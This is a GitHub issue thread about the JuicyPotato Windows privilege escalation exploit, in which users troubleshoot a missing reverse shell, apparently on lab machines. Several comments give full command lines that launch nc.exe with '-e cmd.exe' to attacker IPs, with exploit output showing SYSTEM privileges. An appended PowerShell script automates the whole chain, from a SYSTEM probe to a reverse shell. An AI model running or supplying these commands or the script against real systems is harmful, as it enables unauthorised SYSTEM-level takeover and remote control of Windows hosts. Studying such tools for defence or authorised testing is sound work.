ohpe / juicy-potato

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.
https://ohpe.github.io/juicy-potato/
GNU General Public License v3.0

[+] CreateProcessWithTokenW OK but no shell #13

Closed 0xm4ud closed 1 year ago

0xm4ud commented 4 years ago

After everything runs, it doesn't execute the file I give it:

./juicypotato.exe -l 1234 -p C:\Users\Destitute\appdata\local\temp\nc.exe -a "cmd.exe 10.10.18.93 9005" -t * -c '{E48EDA45-43C6-48e0-9323-A7B2067D9CD5}'

Testing {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} 1234
......
[+] authresult 0
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

After that nothing happens. I've tried giving it different bat files and whatnot. Can anyone point me in a better direction?

0xTen commented 4 years ago

You forgot the '-e' in the netcat args string:

./juicypotato.exe -l 1234 -p C:\Users\Destitute\appdata\local\temp\nc.exe -a "-e cmd.exe 10.10.18.93 9005" -t * -c '{E48EDA45-43C6-48e0-9323-A7B2067D9CD5}'

secfung commented 2 years ago

Hi, I got the same issue, where I could not get the shell.


1.exe = juicypotato; rev.bat: (screenshot)

I tried below:

  1. Different CLSIDs
  2. nc.exe or nc64.exe
  3. A different netcat destination port
  4. Directly executing rev.bat, which does get the shell


Already spent 3 hours testing and searching, but no luck. Any clue on this? Thank you!

yichunhuang commented 2 years ago

Having the same issue as @secfung, did you manage to solve it?

daMatz commented 1 year ago

I have the same issue as @secfung and @yichunhuang.

Any solutions in the meantime? Did you guys figure out anything?

michaelkhchan commented 6 months ago

I know this issue is closed, but I just want to share what I found so far:

So I was facing a similar issue when I was playing with a vulnerable box, where I also got the "CreateProcessWithTokenW OK" response.

JuicyPotato.exe -p C:\Temp\nc.exe -a "-e C:\Windows\System32\cmd.exe 10.10.14.16 5555" -t t -l 1337 -c {4991d34b-80a1-4291-83b6-3328366b9097}

This returns:

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

However, no shell was returned to my Netcat listener on port 5555.

I then attempted to troubleshoot by calling cmd to create a text file instead:

JuicyPotato.exe -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Temp\test.txt" -t t -l 1337 -c {4991d34b-80a1-4291-83b6-3328366b9097}

And guess what - it works! The test.txt contains nt authority\system, which means that the exploit actually worked and the issue is most likely with nc.exe.

After another 2 hours of experimenting, I finally got the reverse shell to work by calling CMD to call nc.exe:

JuicyPotato.exe -p C:\Windows\System32\cmd.exe -a "C:\Temp\nc.exe -e cmd.exe 10.10.14.16 5555" -t t -l 1337 -c {4991d34b-80a1-4291-83b6-3328366b9097}

And this time it successfully connected to my netcat listener.

To conclude - my guess is it may be something related to JuicyPotato not being able to directly execute nc.exe, and it can only execute cmd.exe to then call another application with SYSTEM privileges. Hope that helps after 4 years!
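The probe-then-payload approach from the comment above, scripted, as an added example that is neither the juicy-potato project's own code nor anything posted in this thread. The point it encodes: "[+] CreateProcessWithTokenW OK" only tells you that a process was created with the SYSTEM token; it says nothing about whether that process reached your listener, so a payload with an on-disk side effect (whoami into a file) separates an exploit failure from a payload failure before you spend hours on netcat. Assumed and hypothetical: PowerShell on the target, JuicyPotato.exe and nc.exe under C:\Temp, the CLSID, COM port, attacker address and listener port copied from the comment above as placeholders to replace, and a %TEMP% path without spaces (JuicyPotato hands the -a string to the new process verbatim, so the script avoids extra quoting). The JuicyPotato flags (-t, -l, -c, -p, -a) are used exactly as in the thread.

```powershell
# Added example, not part of the juicy-potato project or of this thread.
# All paths, the CLSID, ports and the attacker address are placeholders.
param(
    [string]$JuicyPotato = 'C:\Temp\JuicyPotato.exe',
    [string]$Clsid       = '{4991d34b-80a1-4291-83b6-3328366b9097}',
    [int]   $ComPort     = 1337,
    [string]$Attacker    = '10.10.14.16',
    [int]   $ShellPort   = 5555,
    [string]$Nc          = 'C:\Temp\nc.exe'
)

$cmd   = "$env:SystemRoot\System32\cmd.exe"
# Assumed: $env:TEMP contains no spaces, so no quoting is needed inside -a.
$probe = "$env:TEMP\jp_probe_$(Get-Random).txt"

# Step 1: probe. The payload is cmd.exe itself writing whoami to a file, so the
# result is visible on disk whatever happens to the network side.
$probeArgs = @('-t', 't', '-l', $ComPort, '-c', $Clsid,
               '-p', $cmd, '-a', "/c whoami > $probe")
& $JuicyPotato @probeArgs | Out-Null
Start-Sleep -Seconds 2

if (-not (Test-Path $probe)) {
    # No file at all: the SYSTEM process was never created (or never ran cmd).
    Write-Warning 'Probe file not written: the impersonation itself failed; try another CLSID or a free -l port.'
    exit 1
}
$who = (Get-Content $probe -Raw).Trim()
Remove-Item $probe -ErrorAction SilentlyContinue
if ($who -notmatch 'nt authority\\system') {
    # File exists but not as SYSTEM: the token was not the one expected.
    Write-Warning "Probe ran as '$who', not SYSTEM."
    exit 1
}
Write-Host "[+] Probe ran as $who; the exploit works, so a missing shell is a payload problem."

# Step 2: real payload, launched through cmd.exe as the thread found necessary.
# The thread's working command omitted /c; /c is cmd.exe's documented form for
# running one command line. Note that -e belongs inside the nc argument string.
$payload = "/c $Nc -e $cmd $Attacker $ShellPort"
& $JuicyPotato -t t -l $ComPort -c $Clsid -p $cmd -a $payload
```

Run it from the low-privilege shell with a listener already waiting on the attacker side; if step 1 passes and step 2 still produces no connection, the remaining variables are the nc binary (32- vs 64-bit, missing -e support) and egress filtering, not JuicyPotato.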